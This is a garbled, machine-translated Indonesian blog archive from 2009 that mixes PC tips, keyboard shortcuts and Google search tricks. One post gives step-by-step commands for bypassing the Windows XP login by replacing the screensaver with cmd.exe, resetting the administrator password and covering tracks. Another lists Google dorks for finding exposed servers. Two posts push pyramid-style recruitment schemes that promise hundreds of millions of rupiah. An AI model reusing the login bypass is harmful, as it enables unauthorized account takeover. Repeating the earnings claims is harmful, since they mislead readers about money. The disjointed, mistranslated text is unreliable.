Jumat, 31 Juli 2009

How to Care System and Accelerating Work Computers

In day-to-day work with computers, sometimes with a different computer for a delay or even damage to the computer system so that it is the performance of the computer itself and the employees or computer users.

When the computer system a delay of several causes that need to diwaspadai, among others:

1. Virus infection.
2. Because of the hardware (hardware).
3. Care system (software) that are less.


For the treatment of computer virus attacks could be installed with a free antivirus or paid as outlined in the previous article "Anti Computer Virus." there is provided a few website addresses to download.

In "How to care computer system", here to note is how the computer when the hardware is ready but still need treatment in the system or software, the system here kususnya Windows XP or Vista.

There are a few tips care system such as the following:

1. Try using the software Windows XP or Vista is genuine, not pirated because the original can always update to the Internet, so that when the leak (hole) in the system windows can be closed with the update directly via the Internet.

2. Anti virus either free or already paid in and install the update.

3. Clean the trash-bin system with computer assistance programs, not automatic manually, the program is small but very good to treat the system, namely to delete internet cookies, delete files used files such as bak-bak. and most important to remove leftover registry when installing a new program. You can also un-install program.

4. When you're finished and then Install the program to accelerate the speed of hard drives and memory, the program is also a small but formidable function, many menu options are: clean error, fix error, system speed, disk speed etc..

After Install run the program with the click 2x application and select the menu is available. Once completed you will be guaranteed a computer faster than the original.

Kamis, 30 Juli 2009

Welcome to the KomisiGRATIS.com

MOST spectacular!
(First in Indonesia)

"Generate Rp.277 Juta, - Over
Disseminate ads while you own "

Super EASY & 100% GRATIS


Partners Netter Sekalian ...
Welcome to the KomisiGRATIS.com

This site is designed as an alternative source of revenue for the Indonesian people to increase incomes.

100% RISK FREE

We will not impose any cost To Join .. So there is no risk at all for you to run this program.
"We say goodbye to you, because the fore in a few minutes you will have a SOURCE PENGHASILAN that will change your financial condition"

Netter Dear Friend .....

To produce more than Rp.277 Juta, - of this program is very easy, you just follow the 2 simple steps below:

1. Join With Us in www.KomisiGRATIS.com/?id=schevanovic

"100% Free, No Fees or Special Expertise Can Anything To join"

Even with the join you will get various FACILITY DIRECT as follows:

* Bonus EBook directly Various high-quality
* A Private Office Virual (Member Area)
* Facilities Ad As VIRUS carrier, click here
* Free Business Information & other Money Source
* URL pattern with time:
http://www.komisigratis.com/?id=username_anda

>>> JOIN INDIRECT, Please click http://www.komisigratis.com/?id=schevanovic
FREE BONUS can have more ...

2. Invite 10 people to join it


Yah .. you only have to invite 10 people to join
As a return and we will give COMMISSION of Rp.25, - for every person that you Rekrut, and Rp.25, - for every person recruited by the network to you under your Level 7.

Use your own URL (http://www.komisigratis.com/?id=username_anda) to recruit, because sipapun who sign up through the URL is automatically included in your network.



Next Illustration COMMISSION that you will get
With the Matrix System (10 x 7 LEVEL)


SPONSOR LEVEL MATRIX Downline COMMISSION ditiap Level (Rp) Per COMMISSION level (Rp)

# 1 10 x@Rp.25, - Rp.250, --
# 2 10x10 x@Rp.25, - Rp.2.500, --
# 3 10x10x10 x@Rp.25, - Rp.25.000, --
# 4 10x10x10x10 x@Rp.25, - Rp.250.000, --
# 5 10x10x10x10x10 x@Rp.25, - Rp.2.500.000, --
# 6 10x10x10x10x10x10 x@Rp.25, - Rp.25.000.000, --
# 7 10x10x10x10x10x10x10 x@Rp.25, - Rp.250.000.000, --

Your total COMMISSION:
Rp.277.777.750, --
(Two hundred Puluh Seven Seven Million, Seven hundred and seven Puluh Seven thousand, seven hundred five Puluh Rupih)


WOW ..

Only recruit 10 people with

You will get:

Rp.277.777.750, --

REMEMBER!

You only need to Search for People only 10

Let the rest and the network under your

(With 100% FREE Capital Of akan not difficult Search for 10 People)

Payment COMMISSION how you?
COMMISSION akan ditrasfer directly to your account, can be taken after reaching a minimum number of Rp.100.000, - Click the button to Withdraw we provide in the Member Area *.

* For the COMMISSION administration will be charged 10% of the value that will be sent, and cut directly at the delivery COMMISSION.


Not Very Simple ..?!!

Tunggu apalagi!

Join now ...

100% FREE, free of cost
Risks and Free Same Sekali


System Support:


To support the success of your site is also complete with:

1. Reseller System.
If you join, you will get a replica of the website / URL sebgaia with the following pattern:

http://www.KomisiGRATIS.com/?id=username_anda

URL of this work to develop your network, where anyone who join through this URL will automatically become your Downline.

In addition, the URL will also display the information that you have a business click here

2.Water Flow Randomizer (WFR),
This system works to provide benefits for you all 24 hours a day forever. When there is a visitor will sign up and enter the website WITHOUT SPONSOR, So Automatic System akan perform Randomizer (pengacakan) Member of the whole to be a sponsor / upline. Randomizer system will precede the member do not have a downline downline or at least, and if there are some member who equally do not have downline the system will select a member to join the first as Sponsors. Flow Like Water (water flow), the randomizer will flow down first.

3.Water Flow Spill Over (WFSO),
Time member of the Matrix met (Past Downline reach 10) then (merit) next Downline Automatically, the system will perform Spill Over (limpahan) network down. The network system will not get the same downline once you have a downline or at least to be given Spill Over (limpahan). If the network were still not have a downline or downlinenya same amount, the system will search for Join the first on the web to be Spill Over. Flow Like Water (water flow), the Spill Over this will flow down first.

4.Full Report System
->> You can monitor your progress throughout the program through the Member Area, which includes:
1. The number of downline that you have to get under your Level 7
2. Total Number of Each COMMISSION LEVEL
3. COMMISSION amount that you have Capture
4. COMMISSION yet the amount you Take
5. Etc.


5. Fair System
Who better to work and try hard, will get more results in a shorter time, not only the member who first joined, so do not hesitate to join soon to be Succsess Business Online in this program and create MESIN of UANG akan that overwhelm your bank account. Besides, this program is also the honesty and togetherness in the running of this business, so it does not prevent the cheating member can be detrimental - other member.

To join Please click http://www.komisigratis.com/?id=schevanovic


Sincerely,
bintang setya vidayanto

free money on the internet

Many ways you can do to get free money on the internet in the form of dollar or rupiah. One of the www.reviews16.com
This website offers free money in the form of rupiah if joined with it. Registration is also free. Suitable for those of you who are seeking a completely free.
And what if the benefits to register?
At least you are not charged to join. Then you can also bonuses such as:
- Creating a Website Guide Ebook
- Instant Ebook Create Web Using WordPress Through Cpanel Hosting
- Technical Guide Free Search for the Money With Online Business Opportunities Today.
And some of the other

In addition, the ads that you attach akan spread like a virus along with the development of your network.
And the most awaited, of course, money.
How much money is available?
Each new referral you recruit, you can bonus akan Rp. 50, --
Kok bonusnya very small? Whoa. Do not sepelekan money Rp. 50, - is. Because this also applies to high level 10. So for example you get 5 refferal and form a network to perfect level to 10, then your income is: 5x5x5x5x5x5x5x5x5x5 = 9765625xRp. 50, - = Rp. 488,281,250, --
Not bad eh?
To get a refferal you are not only looking for the 5 people at level 1 and after that you submit to the subordinate to continue developing your network.
Bonus can be taken after at least collected Rp. 50.000, --

What should you do now?
Interested or not, please try the list first. Yet, you are not losers because it's free.
You need to remember that even though your list without going through the refferal, you still will be a subordinate member of a well-chosen random. This is because the required cooperation to be developed. So, from the sponsor that you can not clear, it is better to sponsor where you can get your information. Iya nggak? Itung-itung sense as thanks for the info given.
Okay, if you want the list please click www.reviews16.com

Activation process of your web replica is approximately 1 to 3 days after the approval of the admin which will be sent directly to your email address. So, use email and the data valid.
To be able to develop your network, it needed the cooperation with your downline

Rabu, 29 Juli 2009

Windows Keyboard Shortcuts

Windows keyboard shortcuts overviewUse shortcut keys as an alternative to the mouse when working in Windows. You can open, close, and navigate the Start menu, desktop, menus, dialog boxes, and Web pages using keyboard shortcuts. Keyboard shortcuts may also make it easier for you to interact with your computer.
Click a heading, or press TAB to highlight a heading, and then press ENTER.

General keyboard shortcuts

Press To
CTRL+C Copy.
CTRL+X Cut.
CTRL+V Paste.
CTRL+Z Undo.
DELETE Delete.
SHIFT+DELETE Delete selected item permanently without placing the item in the Recycle Bin.
CTRL while dragging an item Copy selected item.
CTRL+SHIFT while dragging an item Create shortcut to selected item.
F2 Rename selected item.
CTRL+RIGHT ARROW Move the insertion point to the beginning of the next word.
CTRL+LEFT ARROW Move the insertion point to the beginning of the previous word.
CTRL+DOWN ARROW Move the insertion point to the beginning of the next paragraph.
CTRL+UP ARROW Move the insertion point to the beginning of the previous paragraph.
CTRL+SHIFT with any of the arrow keys Highlight a block of text.
SHIFT with any of the arrow keys Select more than one item in a window or on the desktop, or select text within a document.
CTRL+A Select all.
F3 Search for a file or folder.
ALT+ENTER View properties for the selected item.
ALT+F4 Close the active item, or quit the active program.
ALT+Enter Displays the properties of the selected object.
ALT+SPACEBAR Opens the shortcut menu for the active window.
CTRL+F4 Close the active document in programs that allow you to have multiple documents open simultaneously.
ALT+TAB Switch between open items.
ALT+ESC Cycle through items in the order they were opened.
F6 Cycle through screen elements in a window or on the desktop.
F4 Display the Address bar list in My Computer or Windows Explorer.
SHIFT+F10 Display the shortcut menu for the selected item.
ALT+SPACEBAR Display the System menu for the active window.
CTRL+ESC Display the Start menu.
ALT+Underlined letter in a menu name Display the corresponding menu.
Underlined letter in a command name on an open menu Carry out the corresponding command.
F10 Activate the menu bar in the active program.
RIGHT ARROW Open the next menu to the right, or open a submenu.
LEFT ARROW Open the next menu to the left, or close a submenu.
F5 Refresh the active window.
BACKSPACE View the folder one level up in My Computer or Windows Explorer.
ESC Cancel the current task.
SHIFT when you insert a CD into the CD-ROM drive Prevent the CD from automatically playing.


Dialog box keyboard shortcuts

Press To
CTRL+TAB Move forward through tabs.
CTRL+SHIFT+TAB Move backward through tabs.
TAB Move forward through options.
SHIFT+TAB Move backward through options.
ALT+Underlined letter Carry out the corresponding command or select the corresponding option.
ENTER Carry out the command for the active option or button.
SPACEBAR Select or clear the check box if the active option is a check box.
Arrow keys Select a button if the active option is a group of option buttons.
F1 Display Help.
F4 Display the items in the active list.
BACKSPACE Open a folder one level up if a folder is selected in the Save As or Open dialog box.


Natural keyboard shortcuts

You can use the following keyboard shortcuts with a Microsoft Natural Keyboard or any other compatible keyboard that includes the Windows logo key () and the Application key ().

Press To
Display or hide the Start menu.
+BREAK Display the System Properties dialog box.
+D Show the desktop.
+M Minimize all windows.
+Shift+M Restores minimized windows.
+E Open My Computer.
+F Search for a file or folder.
CTRL+ +F Search for computers.
+F1 Display Windows Help.
+ L Lock your computer if you are connected to a network domain, or switch users if you are not connected to a network domain.
+R Open the Run dialog box.
Display the shortcut menu for the selected item.
+U Open Utility Manager.

Accessibility keyboard shortcuts

Press To
Right SHIFT for eight seconds Switch FilterKeys on and off.
Left ALT +left SHIFT +PRINT SCREEN Switch High Contrast on and off.
Left ALT +left SHIFT +NUM LOCK Switch MouseKeys on and off.
SHIFT five times Switch StickyKeys on and off.
NUM LOCK for five seconds Switch ToggleKeys on and off.
+U Open Utility Manager.


Windows Explorer keyboard shortcuts

Press To
END Display the bottom of the active window.
HOME Display the top of the active window.
NUM LOCK+ASTERISK on numeric keypad (*) Display all subfolders under the selected folder.
NUM LOCK+PLUS SIGN on numeric keypad (+) Display the contents of the selected folder.
NUM LOCK+MINUS SIGN on numeric keypad (-) Collapse the selected folder.
LEFT ARROW Collapse current selection if it's expanded, or select parent folder.
RIGHT ARROW Display current selection if it's collapsed, or select first subfolder.


Notes

You must associate a password with your user account to secure it from unauthorized access. If you do not have a password associated with your user account, pressing the +L will not prevent other users from accessing your account information.
Some keyboard shortcuts may not work if StickyKeys is turned on in Accessibility Options.
If you are connected to Windows through Microsoft Terminal Services Client, some shortcuts have changed. For more information, see the online documentation for Terminal Services Client.
Related Topics

WINDOWS HACK TIPS COLLECTION

How to hack windows XP admin password
If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:
cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos
Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.
Once this happens if you enter this command minus the quotes
"net user password"
If the Administrator Account is called Frank and you want the password blah enter this
"net user Frank blah"
and this changes the password on franks machine to blah and your in.

Have fun
p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks

Registry Hacking
Display legal notice on startup:
Wanna tell your friends about the do's and dont's in your computer when they login in your absence. Well you can do it pretty easily by displaying a legal notice at system start up.
REGEDIT
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"legalnoticecaption"="enter your notice caption"
"legalnoticetext"="enter your legal notice text"
Automatic Administrator Login:
Well here's the trick which you can use to prove that Windows XP is not at all secure as multi-user operating system. Hacking the system registry from any account having access to system registry puts you in to the administrator account.
REGEDIT 4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"AutoAdminLogon"="1"
No Shutdown:
Wanna play with your friends by removing the shutdown option from start menu in their computer.
Just hack it down !!!
Regedit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
"NoClose"="DWORD:1"
Menu Delays:
Another minor and easy tweak to remove any delay from menus sliding out. For this you will need to use regedit (open regedit by going to Start -> Run..., then typing 'regedit' and pressing enter). The key you need to change is located in HKEY_CURRENT_USERControl PanelDesktop. The actual key is called MenuShowDelay - all you have to do is change the value to 0. Remember, you will have to re-boot your computer for this tweak to take effect.
GPEDIT.MSC And Autoplay
A great tweaking file that comes with XP is gpedit.msc. Go to Start -> Run... and then type in 'gpedit.msc' and press enter. This is effectively the Policies Editor, and it comes in handy often. For example, if you hate CD autoplay like I do and want to permanently disable it, you can use this tool to do so. Just run gpedit.msc, then go to Computer Configuration -> Administrative Templates -> System. In here you can see the value 'Turn Off Autoplay'. Right-click on it and then click 'Properties'.
Increasing options in add/remove programs:
Not a fan of MSN Messenger? don't want Windows Media Player on your system? Fair enough, but if you go to Add/Remove Programs in the Control Panel, by default none of Windows XP's 'built in' programs are visible. it's fairly easy to change, though... just open the file X:\Windows\inf\sysoc.inf (where X: is the drive letter where Windows XP is installed) in Notepad. You should see a section of the file something like this:
[Components]
NtComponents=ntoc.dll,NtOcSetupProc,,4
WBEM=ocgen.dll,OcEntry,wbemoc.inf,hide,7
Display=desk.cpl,DisplayOcSetupProc,,7
Fax=fxsocm.dll,FaxOcmSetupProc,fxsocm.inf,,7
NetOC=netoc.dll,NetOcSetupProc,netoc.inf,,7
iis=iis.dll,OcEntry,iis.inf,,7
com=comsetup.dll,OcEntry,comnt5.inf,hide,7
dtc=msdtcstp.dll,OcEntry,dtcnt5.inf,hide,7
IndexSrv_System = setupqry.dll,IndexSrv,setupqry.inf,,7
TerminalServer=TsOc.dll, HydraOc, TsOc.inf,hide,2
msmq=msmqocm.dll,MsmqOcm,msmqocm.inf,,6
ims=imsinsnt.dll,OcEntry,ims.inf,,7
fp_extensions=fp40ext.dll,FrontPage4Extensions,fp40ext.inf,,7
AutoUpdate=ocgen.dll,OcEntry,au.inf,hide,7
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
RootAutoUpdate=ocgen.dll,OcEntry,rootau.inf,,7
IEAccess=ocgen.dll,OcEntry,ieaccess.inf,,7
This is a list of all components installed at the moment. I've taken the example of MSN Messenger - the program entry called 'msmsgs', third-last line. You can see the word 'hide' highlighted - this is the string which tells Windows not to display the component in the Add/Remove Programs list. Fix this up by simply deleting the word 'hide' like so:
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
To this:
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,,7
Now, after restarting, you should be able to see MSN Messenger in the Add/Remove Programs list. If you want to be able to quickly view and remove all components, simply open the sysoc.inf file and do a global find and replace for the word ",hide" and replace it with a single comma ",".
Automatically Kill Programs At Shutdown:
don't you hate it when, while trying to shut down, you get message boxes telling you that a program is still running? Making it so that Windows automatically kills applications running is a snap. Simply navigate to the HKEY_CURRENT_USERControl PanelDesktop directory in the Registry, then alter the key AutoEndTasks to the value 1.
Speeding Up Share Viewing:
This is a great tweak. Before I found it, I was always smashing my head against the table waiting to view shares on other computers. Basically, when you connect to another computer with Windows XP, it checks for any Scheduled tasks on that computer - a fairly useless task, but one that can add up to 30 seconds of waiting on the other end - not good! Fortunately, it's fairly easy to disable this process. First, navigate to HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/Current Version/Explorer/RemoteComputer/NameSpace in the Registry. Below that, there should be a key called {D6277990-4C6A-11CF-8D87-00AA0060F5BF}. Just delete this, and after a restart, Windows will no longer check for scheduled tasks - mucho performance improvement!
Create a Shortcut to Lock Your Computer
Leaving your computer in a hurry but you don't want to log off? You can double-click a shortcut on your desktop to quickly lock the keyboard and display without using CTRL+ALT+DEL or a screen saver. To create a shortcut on your desktop to lock your computer: Right-click the desktop. Point to New, and then click Shortcut. The Create Shortcut Wizard opens. In the text box, type the following: rundll32.exe user32.dll,LockWorkStation Click Next. Enter a name for the shortcut. You can call it "Lock Workstation" or choose any name you like. Click Finish. You can also change the shortcut's icon (my personal favorite is the padlock icon in shell32.dll). To change the icon: Right click the shortcut and then select Properties. Click the Shortcut tab, and then click the Change Icon button. In the Look for icons in this file text box, type: Shell32.dll. Click OK. Select one of the icons from the list and then click OK You could also give it a shortcut keystroke such CTRL+ALT+L. This would save you only one keystroke from the normal command, but it could be more convenient.
Speed up Internet Explorer 6 Favorites
For some reason, the Favorites menu in IE 6 seems to slow down dramatically sometimes--I've noticed this happens when you install Tweak UI 1.33, for example, and when you use the preview tip to speed up the Start menu. But here's a fix for the problem that does work, though it's unclear why: Just open a command line window (Start button -> Run -> cmd) and type sfc, then hit ENTER. This command line runs the System File Checker, which performs a number of services, all of which are completely unrelated to IE 6. But there you go: It works.
Aspi
WinXP does not come with an Aspi layer. So far almost 90% of the problems with WinXP and CD burning software are Aspi layer problems. After installing WinXP, before installing any CD burning software do a few things first: 1. Open up "My computer" and right click on the CD Recorder. If your CD recorder was detected as a CD recorder there will be a tab called "Recording". On this tab uncheck ALL of the boxes. apply or OK out of it and close my computer. 2. Next install the standard Aspi layer for NT. Reboot when asked. That's is. after the reboot you can install any of the currently working CD recording applications with no problems. If using CD Creator do not install direct CD or Take two as they are currently incompatible but Roxio has promised a fix as soon as XP is released.

20 Great Google Secrets

20 Great Google Secrets

http://www.pcmag.com/article2/0,4149,1306756,00.asp

excl.gif No Active Links, Read the Rules - Edit by Ninja excl.gif

Google is clearly the best general-purpose search engine on the Web (see

www.pcmag.com/searchengines

But most people don't use it to its best advantage. Do you just plug in a keyword or two and hope for the best? That may be the quickest way to search, but with more than 3 billion pages in Google's index, it's still a struggle to pare results to a manageable number.

But Google is an remarkably powerful tool that can ease and enhance your Internet exploration. Google's search options go beyond simple keywords, the Web, and even its own programmers. Let's look at some of Google's lesser-known options.

Syntax Search Tricks

Using a special syntax is a way to tell Google that you want to restrict your searches to certain elements or characteristics of Web pages. Google has a fairly complete list of its syntax elements at

www.google.com/help/operators.html

. Here are some advanced operators that can help narrow down your search results.

Intitle: at the beginning of a query word or phrase (intitle:"Three Blind Mice") restricts your search results to just the titles of Web pages.

Intext: does the opposite of intitle:, searching only the body text, ignoring titles, links, and so forth. Intext: is perfect when what you're searching for might commonly appear in URLs. If you're looking for the term HTML, for example, and you don't want to get results such as

www.mysite.com/index.html

, you can enter intext:html.

Link: lets you see which pages are linking to your Web page or to another page you're interested in. For example, try typing in

link:http://www.pcmag.com

Try using site: (which restricts results to top-level domains) with intitle: to find certain types of pages. For example, get scholarly pages about Mark Twain by searching for intitle:"Mark Twain"site:edu. Experiment with mixing various elements; you'll develop several strategies for finding the stuff you want more effectively. The site: command is very helpful as an alternative to the mediocre search engines built into many sites.

Swiss Army Google

Google has a number of services that can help you accomplish tasks you may never have thought to use Google for. For example, the new calculator feature

(www.google.com/help/features.html#calculator)

lets you do both math and a variety of conversions from the search box. For extra fun, try the query "Answer to life the universe and everything."

Let Google help you figure out whether you've got the right spelling-and the right word-for your search. Enter a misspelled word or phrase into the query box (try "thre blund mise") and Google may suggest a proper spelling. This doesn't always succeed; it works best when the word you're searching for can be found in a dictionary. Once you search for a properly spelled word, look at the results page, which repeats your query. (If you're searching for "three blind mice," underneath the search window will appear a statement such as Searched the web for "three blind mice.") You'll discover that you can click on each word in your search phrase and get a definition from a dictionary.

Suppose you want to contact someone and don't have his phone number handy. Google can help you with that, too. Just enter a name, city, and state. (The city is optional, but you must enter a state.) If a phone number matches the listing, you'll see it at the top of the search results along with a map link to the address. If you'd rather restrict your results, use rphonebook: for residential listings or bphonebook: for business listings. If you'd rather use a search form for business phone listings, try Yellow Search

(www.buzztoolbox.com/google/yellowsearch.shtml).

Extended Googling

Google offers several services that give you a head start in focusing your search. Google Groups

(http://groups.google.com)

indexes literally millions of messages from decades of discussion on Usenet. Google even helps you with your shopping via two tools: Froogle CODE (http://froogle.google.com),

which indexes products from online stores, and Google Catalogs CODE (http://catalogs.google.com),

which features products from more 6,000 paper catalogs in a searchable index. And this only scratches the surface. You can get a complete list of Google's tools and services at

www.google.com/options/index.html

You're probably used to using Google in your browser. But have you ever thought of using Google outside your browser?

Google Alert

(www.googlealert.com)

monitors your search terms and e-mails you information about new additions to Google's Web index. (Google Alert is not affiliated with Google; it uses Google's Web services API to perform its searches.) If you're more interested in news stories than general Web content, check out the beta version of Google News Alerts

(www.google.com/newsalerts).

This service (which is affiliated with Google) will monitor up to 50 news queries per e-mail address and send you information about news stories that match your query. (Hint: Use the intitle: and source: syntax elements with Google News to limit the number of alerts you get.)

Google on the telephone? Yup. This service is brought to you by the folks at Google Labs

(http://labs.google.com),

a place for experimental Google ideas and features (which may come and go, so what's there at this writing might not be there when you decide to check it out). With Google Voice Search

(http://labs1.google.com/gvs.html),

you dial the Voice Search phone number, speak your keywords, and then click on the indicated link. Every time you say a new search term, the results page will refresh with your new query (you must have JavaScript enabled for this to work). Remember, this service is still in an experimental phase, so don't expect 100 percent success.

In 2002, Google released the Google API (application programming interface), a way for programmers to access Google's search engine results without violating the Google Terms of Service. A lot of people have created useful (and occasionally not-so-useful but interesting) applications not available from Google itself, such as Google Alert. For many applications, you'll need an API key, which is available free from CODE www.google.com/apis

. See the figures for two more examples, and visit

www.pcmag.com/solutions

for more.

Thanks to its many different search properties, Google goes far beyond a regular search engine. Give the tricks in this article a try. You'll be amazed at how many different ways Google can improve your Internet searching.

Online Extra: More Google Tips

Here are a few more clever ways to tweak your Google searches.

Search Within a Timeframe

Daterange: (start date-end date). You can restrict your searches to pages that were indexed within a certain time period. Daterange: searches by when Google indexed a page, not when the page itself was created. This operator can help you ensure that results will have fresh content (by using recent dates), or you can use it to avoid a topic's current-news blizzard and concentrate only on older results. Daterange: is actually more useful if you go elsewhere to take advantage of it, because daterange: requires Julian dates, not standard Gregorian dates. You can find converters on the Web (such as

CODE http://aa.usno.navy.mil/data/docs/JulianDate.html

excl.gif No Active Links, Read the Rules - Edit by Ninja excl.gif

), but an easier way is to do a Google daterange: search by filling in a form at

www.researchbuzz.com/toolbox/goofresh.shtml or www.faganfinder.com/engines/google.shtml

. If one special syntax element is good, two must be better, right? Sometimes. Though some operators can't be mixed (you can't use the link: operator with anything else) many can be, quickly narrowing your results to a less overwhelming number.

More Google API Applications

Staggernation.com offers three tools based on the Google API. The Google API Web Search by Host (GAWSH) lists the Web hosts of the results for a given query

(www.staggernation.com/gawsh/).

When you click on the triangle next to each host, you get a list of results for that host. The Google API Relation Browsing Outliner (GARBO) is a little more complicated: You enter a URL and choose whether you want pages that related to the URL or linked to the URL

(www.staggernation.com/garbo/).

Click on the triangle next to an URL to get a list of pages linked or related to that particular URL. CapeMail is an e-mail search application that allows you to send an e-mail to google@capeclear.com with the text of your query in the subject line and get the first ten results for that query back. Maybe it's not something you'd do every day, but if your cell phone does e-mail and doesn't do Web browsing, this is a very handy address to know.

you want to know how I can through money from friendster?

If you hear the words "social networking
"What is implied in your mind? Probably most of you will mention the words" Friendster "? ...
It is true friendster.com social networking services is the largest at this time, up from the student, general, and even the artist Sandra dewi classmates also have a Friendster ID (Id I want it? Search only their own). How long will you join in this? 1 month? 6 months? 1 year? or more than 1 year? What you get from this?

Maybe you can up to now is only the number of hits and visits for your new friend .. What a laptop to give you the dollar because the number of hits to your myspace? NEVER ....!!!

That is the injustice of the members look after the member raising a laptop but not a bit member is given an award and reward. Try you imagine how much traffic into friendster. Com in one day? one month? one year?

If you feel resentful because no attention at all from your friends who have been exaggerated, it may be time to turn social networking service that is similar r.yuwie.com / joecoe!

What's with r.yuwie.com / joecoe? yuwie.com in which each member joined Rewards will be given a dollar that will go to the bank account or Paypal alertpay you, you do not have can be stored in the first yuwie or you want to cash out could also have a brother or what have you that the account is of course with the agreement .....

You are paid based on your activity. Everything is calculated. From login, edit profile, upload photos, or send a message, comment, fill in guest book, see the profile of others, looking for friends, join a discussion forum, create your own group, fill the blog with the topic you set yourself, or make a complete pooling online, post ads (if any), play games (if any), and others. if you want to increase revenue and seek referral (refferal / friend you) as much as possible. of course with a reference from your links, referrals to free and how you want the depth to 10 levels.

When and how you paid yuwie? yuwie pays you when you or other people to open:

* Your Profile page
* Blog your pages
* Page view all your friends
* Page view all your comments
* Pages your pictures
* These pages your video pages
* When someone view your shared layouts

Each page that is opened / viewed (page view), all of that will be one (1) dan akan diakumulasikan.

Assume you only invite 3 friends and your friends each bring 3 people along the 10 level. And they make you click on the view yuwie.com only 1000 per month:

Your 10% x $ 0.5 = $ 0.05
Level 1 = 10% x 3x $ 0.5 = $ 0.15
Level 2 = 10% x 9 x $ 0.5 = $ 0.45
Level 3 = 10% x 27 x $ 0.5 = $ 1.35
Level 4 = 4 x 81% x $ 0.5 = $ 1.62
Level 5 = 4 x 243% x $ 0.5 = $ 4.86
Level 6 = 4% x $ 729 x 0.5 = $ 14.58
Level 7 = 4% x $ 2187 x 0.5 = $ 43.74
Level 8 = 4% x $ 6561 x 0.5 = $ 131.22
Level 9 = 10% x $ 19,683 x 0.5 = $ 984.15
Level 10 = 30% x $ 59,049 x 0.5 = $ 8857.35
Total = $ 10,039.52

multiplied by the dollar value against the dollar at this time ........
Why? you interested?
while still not a lot .....
prey on the list now r.yuwie.com / select joecoe how to sign up now ....
content to live alone ....
finished ...
simple? setlah pc through the list you can also play on yuwie you operamini in the mobile phone ..... you add a view ....
you want share2 PTC can also .....
though the dollar we can add many ...

info:
fs: hunting_sniper@plasa.com
email: hunting_sniper@yahoo.com
08970182037

Dangerous tools from Google

Silence Still, this site gives us tools to do the most dangerous hacking around the world, although this google tools can only provide up to the level footprinting have also get to the next level. why I call it the tools? because we use google to search for the unsecure media, that is easy to hack in the air, the pitch has not been updated, because google has the power to it all.

of this tutorial is to be established:

* How do I use google to find sources of personal information and other confidential data
* How do I find information about Vulnerable systems and Web services
* How do I find publicly available network devices.


Of the first things that should be in the know is Google Query operators
Query operator is functioning as a rough filtering its search google based on a more specific query that we want, each query has its own function itself. following description and its cone ....

site
filtering based on an existing domain
example: site: google.com fox -> akan search word fox in the google.com site

intitle
Filter documents that have a specific title
example: intitle: fox fire -> akan explore all the site have said there are fox and fire text

allintitle
Filter to search for documents intitle intile
example: allintitle: fox fire -> akan explore all the site has a title that has a fox and fire or title = intitle: fox intitle: fire


inurl
Filter search with a specific url
example: inurl: fox fire -> akan searched for fire in the website url that is there is a fox

allinurl
Same with Allintitle (only this url)

filetype, ext
Filter the search for a specific document
example: filetype: pdf fire -> akan search PDF files in which there said fire

cool example: filetype: doc university IT

numrange
Filter on a specific document based on the range
example: numrange :1-100 fire -> akan find that there is a range of 1-100 words fire

link
Filter site site that has a link to a specific site
example: link: www.google.com -> search site akan aja site which has links to google.com

inanchor
Filtering based on the existing site description
example: inanchor: fire -> akan find that fire has a description

think about that is the query that queries google cool cool, I have the rest, such as:
/ * - + "" (Yes this is a normal regular ekspression, so it needs to explain in more detail)

nah, from there, kia can kreasikan to the various types of query to filter out anything, even to something more in, for example, database files ......

Web Servers
to find the target with the easy to use google with the following syntax:
"Apache/1.3.28 Server at" intitle: index.of
-> Apache 1.3.28

"Apache/2.0 Server at" intitle: index.of
-> Apache 2.0

"Apache / * Server at" intitle: index.of
-> All versions of Apache

"Microsoft-IIS/4.0 Server at" intitle: index.of
-> Microsoft Internet Information Services 4.0

"Microsoft-IIS/5.0 Server at" intitle: index.of
-> Microsoft Internet Information Services 5.0

"Microsoft-IIS/6.0 Server at" intitle: index.of
-> Microsoft Internet Information Services 6.0

"Microsoft-IIS / * Server at" intitle: index.of
-> All versions of Microsoft Internet Information Services

"Oracle HTTP Server / * Server at" intitle: index.of
-> All versions of the Oracle HTTP Server

"IBM _ HTTP _ Server / * * Server at" intitle: index.of
-> All versions of IBM HTTP Server

"Netscape / * Server at" intitle: index.of
-> All versions of Netscape Server

"Red Hat Secure / *" intitle: index.of
-> All versions of the Red Hat Secure server

"HP Apache-based Web Server / *" intitle: index.of
-> All versions of the HP server

Some Bug Skripts can be found on google:
"Generated by phpSystem"
-> Can find the operating system type and version, hardware configuration, logged users, open connections, free memory and disk space, mount points

"This summary was generated by wwwstat"
-> Web server statistics, system file structure

"These statistics were produced by getstats"
-> web server statistics, system file structure

"This report was generated by Weblog"
-> web server statistics, system file structure

intext: "Tobias Oetiker" "traffic analysis"
-> system performance statistics as MRTG charts, network configuration

intitle: "Apache: Status" (inurl: server-status | inurl: status.html | inurl: apache.html)
-> the server version, operating system type, child process list, current connections

intitle: "ASP Stats Generator *.*" "
-> ASP Stats

Generator "" 2003-2004 weppos "
-> web server activity, lots of visitor information

intitle: "Multimon UPS status page"
-> UPS device performance statistics

intitle: "statistics of" "advanced web statistics"
-> web server statistics, visitor information

intitle: "System Statistics" + "System and Network Information Center"
-> system performance statistics as MRTG charts, hardware configuration, running services

intitle: "Usage Statistics for" "Generated by Webalizer"
-> web server statistics, visitor information, system file structure

intitle: "Web Server Statistics for ****"
-> web server statistics, visitor information

inurl: "/ axs / ax-admin.pl"-script
-> web server statistics, visitor information

inurl: "/ cricket / grapher.cgi"
-> MRTG charts of network interface performance

inurlerver-info "Apache Server Information"
-> web server version and configuration, operating system type, system file structure

"The output produced by SysWatch *"
-> operating system type and version, logged users, free memory and disk space, mount points, running processes, system logs

Error message queries
